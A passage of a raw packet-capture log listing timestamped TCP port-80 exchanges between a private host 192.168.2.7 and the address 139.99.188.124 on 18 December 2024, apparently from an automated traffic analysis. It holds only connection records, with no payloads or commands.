                                                                                        Dec 18, 2024 20:55:46.521173000 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521179914 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521193027 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521472931 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.521986961 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.521996021 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522007942 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522047043 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.522829056 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522838116 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522850037 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522856951 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.522882938 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.523701906 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.523710966 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.523718119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.523822069 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.524535894 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.524590015 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.524597883 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.524691105 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.525501013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525509119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525521040 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525527954 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.525557995 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.526335955 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.526344061 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.526356936 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.526392937 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.527146101 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.527153969 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.527167082 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.527204990 CET4976680192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:46.528064013 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528072119 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:46.528084993 CET8049766139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:49.218987942 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:49.341490984 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738563061 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738723993 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738729954 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738744974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.738898993 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.739296913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.739304066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.739321947 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.739535093 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.740082026 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.740091085 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.740102053 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.740406036 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.861265898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.861274958 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.861463070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.865530968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.954952002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.955080986 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.955108881 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.959213972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.959820032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.960637093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.960951090 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.961204052 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.968925953 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.969166040 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.969887018 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.977799892 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.977966070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.978141069 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.986198902 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.986349106 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.986553907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:50.992192984 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.992382050 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:50.992947102 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.000572920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.000786066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.000925064 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.008979082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.009238005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.009582043 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.017422915 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.017663002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.018021107 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.027981043 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.028163910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.028812885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.080173969 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.080950022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.081429005 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.085943937 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.085949898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.086062908 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.169460058 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.169869900 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.170088053 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.171073914 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.171195030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.172034025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.176640034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.176961899 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.177213907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.181770086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.181777000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.182166100 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.187201023 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.187210083 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.187333107 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.192563057 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.192595005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.192991018 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.198471069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.198477983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.198563099 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.203533888 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.203541994 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.203666925 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.208514929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.209005117 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.210077047 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.213952065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.213959932 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.214039087 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.218005896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.218014002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.218168974 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.221662045 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.222109079 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.222345114 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.225296974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.225436926 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.228204966 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.229104042 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.229252100 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.229485989 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.232975960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.232981920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.233167887 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.236716986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.236839056 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.236999035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.240648985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.240716934 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.240938902 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.244422913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.244554043 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.244674921 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.248258114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.248420000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.248677969 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.252041101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.252310991 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.253125906 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.256042957 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.414925098 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.414933920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.415455103 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.416203022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.416209936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.421448946 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.421499968 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.422338009 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.424027920 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.427273989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.427285910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.427968025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.430181980 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.430190086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.430403948 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.432075024 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.432086945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.433125973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.433131933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.433142900 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.435220003 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.435275078 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.435297966 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.435966969 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.436600924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.437170029 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.439443111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.439591885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.439874887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.439975023 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.442500114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.442673922 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.443994045 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.445686102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.445924044 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.448035955 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.448756933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.448859930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.449403048 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.451875925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.452013969 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.452186108 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.454916000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.455104113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.455229998 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.457608938 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.458571911 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.458619118 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.460809946 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.460939884 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.463862896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.463912010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.464020014 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.466655970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.466837883 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.468038082 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.469964981 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.470113993 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.471992016 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.472865105 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.473414898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.475708961 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.855868101 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.856945038 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.856951952 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.857156038 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.858967066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.859025002 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.859102964 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.861076117 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.861121893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.861732960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.863670111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.863677979 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.863781929 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.865502119 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.865509987 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.865644932 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.867295027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.867409945 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.867652893 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.869571924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.869579077 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.869724989 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.871510983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.871604919 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.871622086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.873323917 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.873450041 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.873478889 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.875248909 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.875291109 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.875369072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.877202034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.877274036 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.877329111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.879153967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.879230022 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.879471064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.881160975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.881287098 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.881439924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.884077072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.884083986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.884170055 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.885520935 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.885534048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.885581970 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.887516975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.887523890 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.887584925 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.890249968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.890259027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.890403032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.891993999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.892003059 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.892055988 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.893939018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.893945932 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.894015074 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.897012949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.897020102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.897104979 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.899823904 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.899873972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.899878979 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.901747942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.901756048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.901834011 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.903685093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.903692007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.903740883 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.905580997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.905600071 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.905637026 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.906622887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.906635046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.906672001 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.907809019 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.907820940 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.907913923 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.908826113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.908832073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.908881903 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.909723997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.909739971 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.909813881 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.910752058 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.910758018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.910815954 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.911700010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.911711931 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.911781073 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.912683010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.912689924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.912744999 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.914596081 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.914603949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.914647102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.914658070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.914731026 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.915550947 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.916548014 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.916579962 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.916631937 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.917465925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.917519093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.917543888 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.918797970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.918803930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.918873072 CET4979580192.168.2.7139.99.188.124
